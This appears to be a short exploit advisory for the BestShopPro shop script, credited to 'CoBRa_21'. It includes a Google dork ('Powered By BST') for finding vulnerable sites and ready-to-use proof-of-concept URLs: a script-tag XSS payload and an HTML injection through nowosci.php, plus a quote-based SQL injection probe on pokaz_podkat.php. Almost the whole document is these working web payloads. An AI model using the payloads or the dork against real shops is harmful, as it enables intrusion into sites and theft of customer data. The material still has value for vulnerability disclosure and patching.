BestShopPro suffers from cross site scripting and remote SQL injection vulnerabilities.
540a1e2899f1eeb5b42cd9faa97a86991ef8385ac014a8a49b99929f96f955f1
################################################################################################
# Exploit Title: BST - BestShopPro (nowosci.php) Multiple Vulnerabilities
#
# Author : CoBRa_21
#
# E-Mail : uyku_cu [at] windowslive.com
#
# Google Dork : "Powered By BST"
#
# Script Page : https://www.bst.pl
################################################################################################
#
# XSS:
#
# https://127.0.0.1/nowosci.php?a=1&str=<script>alert(/CoBRa_21/)</script>
#
# HTML:
#
# https://127.0.0.1/nowosci.php?a=1&str=<font color=red size=15>CoBRa_21</font>
#
# SQL :
#
# https://127.0.0.1/pokaz_podkat.php?idkat=10&order1=1&str=' (SQL)
#
################################################################################################